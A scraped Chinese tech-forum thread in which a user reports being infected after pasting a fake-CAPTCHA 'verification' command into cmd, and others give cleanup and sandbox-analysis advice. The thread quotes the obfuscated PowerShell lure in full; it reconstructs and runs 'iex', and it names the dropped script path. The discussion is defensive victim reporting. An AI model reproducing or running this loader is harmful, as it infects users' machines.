又要着急出门办事,吗的!事情越多越乱! 我细想一下,这段代码粘贴后,只能看到代码尾部。这也是个雷区。我运行完后,隐约觉得不对,想粘贴全部代码看看,发现粘贴板没有内容,就又开一个新浏览器,想看看代码。才看到了了powershell,所以想着截图问问坛子里,事情就这么发生了!警惕啊!她妈的!
@fdiskmbr #139 发布于2026/1/29 下午4:15:11 @HgTrojan #131 发布于2026/1/29 下午3:53:59 @fdiskmbr #129 发布于2026/1/29 15:51:54 @HgTrojan #127 发布于2026/1/29 下午3:50:05 @eilo #125 发布于2026/1/29 15:48:08 @fdiskmbr #119 你可以查看内容,但不要双击运行。任务计划程序里,右键禁用,去:C:\ProgramData\Theatricals\你应该能看到railroadingers.ps1 不要直接打开运行,可以右键,用记事本打开查看内容,看看是啥木马,然后就可以离线扫描,最后备份文件 重装系统了 补充一点,你可以用微步的云沙盒执行看看它的C2C外联到哪里,如果是云服务器可以投诉,如果是个人IP可以报 高手!这个如何操作啊 https://s.threatbook.com/ 上传文件总会吧,这里网络行为会列出来的 感谢兄弟!我研究一下 等我回去,把这个分析贴出来!大家一起看!肏!
不知道是什么原理,就是要cmd运行一段代码。 powershell.exe -Wi MINI $JD='dUBLxgwGegPWexMRI.ccepIpZQ';$fQ=.($JD[((-68)+(97))]+$JD[22]+$JD[11]) ($JD.Substring(((99)-(81)),(18)/(2))) -uSEBa; .($fQ.Substring(1,3))($fQ); 就这样的代码,然后,就可以验证通过了。 本来还想虚拟机拿个样本看一眼, 没想到跑不起来 PS: 经2026.01.29 17:26:44测试,楼主给的代码似乎是错误的所以不能运行. 我开bincheck.io/zh是看不到OP的假验证码界面的, 估计OP是被DNS劫持掉了 哦~出现了, 这玩意还做了个假的概率触发
这玩意不是前一阵子挺高热度的木马么?
又要着急出门办事,吗的!事情越多越乱!
我细想一下,这段代码粘贴后,只能看到代码尾部。这也是个雷区。我运行完后,隐约觉得不对,想粘贴全部代码看看,发现粘贴板没有内容,就又开一个新浏览器,想看看代码。才看到了了powershell,所以想着截图问问坛子里,事情就这么发生了!警惕啊!她妈的!
等我回去,把这个分析贴出来!大家一起看!肏!
我草,笑死我了
哈哈哈哈,兄弟,想认识下你,后面没钱了就找你提钱包
哥们上论坛技术过关 网站技术不过关
本来还想虚拟机拿个样本看一眼, 没想到跑不起来
PS: 经2026.01.29 17:26:44测试,楼主给的代码似乎是错误的所以不能运行.
我开bincheck.io/zh是看不到OP的假验证码界面的, 估计OP是被DNS劫持掉了哦~出现了, 这玩意还做了个假的概率触发
我都进页面了才弹cloudflare验证多假啊
@linying23333 #147 powershell 版本太老了,木马不兼容
@libecho #149
哥, 这是powershell 7啊. 不是powershell 5和自带的2哦没事了,我忘记调用了. 我是sb